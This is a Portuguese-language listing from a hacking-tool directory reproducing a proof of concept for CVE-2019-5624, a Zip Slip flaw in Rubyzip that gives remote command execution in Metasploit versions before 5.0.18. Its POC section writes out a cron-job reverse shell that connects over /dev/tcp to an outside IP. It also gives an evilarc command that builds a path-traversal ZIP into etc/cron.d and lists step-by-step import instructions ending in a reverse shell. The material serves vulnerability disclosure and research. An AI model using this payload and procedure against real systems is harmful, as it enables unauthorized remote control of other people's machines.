Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-5624 — Uma prova de conceito para a vulnerabilidade CVE-2019-5624 do Metasploit (RCE por manipulação insegura de ZIP no Rubyzip) | Kitploit
Ferramentas/GitHubGitHub/voidsec/cve-2019-5624
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Uma prova de conceito para a vulnerabilidade CVE-2019-5624 do Metasploit (RCE por manipulação insegura de ZIP no Rubyzip)

Ver Repositório
135há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2019-5624

Uma prova de conceito para a vulnerabilidade CVE-2019-5624 do Metasploit (RCE por manipulação insegura de ZIP no Rubyzip)

Introdução

Em fevereiro de 2019, encontrei uma nova vulnerabilidade na biblioteca Rubyzip. Ela permite que um invasor explore a manipulação insegura de ZIP (Zip Slip), resultando em execução remota de comandos.

Essa vulnerabilidade foi aproveitada para atingir todas as versões do Metasploit < 5.0.18 Metasploit Wrap-Up

Escrevi este post detalhado no blog explicando a vulnerabilidade.

POC

  • Crie um arquivo com o seguinte conteúdo:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • Gere o arquivo ZIP com o payload de path traversal:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • Adicione um workspace válido do MSF ao arquivo ZIP (para que o MSF o extraia; caso contrário, ele se recusará a processar o arquivo ZIP)
  • Configure dois listeners, um na porta 4444 e o outro na porta 4445 (o da porta 4445 receberá o reverse shell)
  • Faça login na interface web do MSF
  • Crie um novo “Project”
  • Selecione “Import”, “From file”, escolha o arquivo ZIP malicioso e, por fim, clique no botão “Import”
  • Aguarde o processo de importação terminar
  • Aproveite o seu reverse shell

Vídeo

Baixar ferramenta